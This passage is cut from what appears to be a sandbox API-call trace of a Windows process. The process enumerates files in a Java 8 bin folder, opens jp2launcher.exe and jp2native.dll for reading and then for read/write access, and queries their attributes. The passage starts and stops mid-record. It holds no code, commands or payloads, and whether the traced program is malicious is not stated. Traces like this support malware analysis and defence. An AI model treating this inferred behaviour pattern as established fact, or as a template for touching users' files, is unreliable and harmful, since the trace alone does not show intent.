(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0092.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0092.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0092.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0092.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0092.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0092.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0092.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0092.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0092.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0092.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a430 [0092.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0092.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0092.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0092.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0092.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.996] AreFileApisANSI () returned 1 [0092.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe", lpUsedDefaultChar=0x0) returned 55 [0092.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0092.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0092.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0092.996] AreFileApisANSI () returned 1 [0092.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0092.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75cd8 [0092.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe") returned 55 [0092.996] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2launcher.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0092.997] GetFileType (hFile=0x360) returned 0x1 [0092.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0092.997] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0092.997] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0092.998] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0092.998] CloseHandle (hObject=0x360) returned 1 [0092.998] AreFileApisANSI () returned 1 [0092.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0092.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75b70 [0092.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe") returned 55 [0092.998] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2launcher.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0092.998] GetFileType (hFile=0x360) returned 0x1 [0092.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0092.998] CloseHandle (hObject=0x360) returned 1 [0092.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0092.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0092.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0092.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0092.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.999] AreFileApisANSI () returned 1 [0092.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0092.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75eb8 [0092.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe") returned 55 [0092.999] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2launcher.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2launcher.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa897bfc2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa897bfc2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89a2223, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1b640)) returned 1 [0092.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0093.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.000] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89a2223, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89a2223, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89a2223, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jp2native.dll", cAlternateFileName="JP2NAT~1.DLL")) returned 1 [0093.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0093.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0093.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0093.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0093.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.000] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0093.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.000] AreFileApisANSI () returned 1 [0093.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll", lpUsedDefaultChar=0x0) returned 53 [0093.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0093.001] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.001] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0093.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.001] AreFileApisANSI () returned 1 [0093.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0093.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75b70 [0093.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll") returned 53 [0093.001] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2native.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.002] GetFileType (hFile=0x360) returned 0x1 [0093.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0093.002] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.002] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.002] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.002] CloseHandle (hObject=0x360) returned 1 [0093.003] AreFileApisANSI () returned 1 [0093.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0093.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76200 [0093.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x76200, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll") returned 53 [0093.003] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2native.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.003] GetFileType (hFile=0x360) returned 0x1 [0093.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0093.003] CloseHandle (hObject=0x360) returned 1 [0093.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.004] AreFileApisANSI () returned 1 [0093.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0093.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 [0093.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll") returned 53 [0093.004] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2native.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2native.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89a2223, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89a2223, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89a2223, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e40)) returned 1 [0093.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0093.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0093.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0093.004] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.004] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.004] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89a2223, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89a2223, 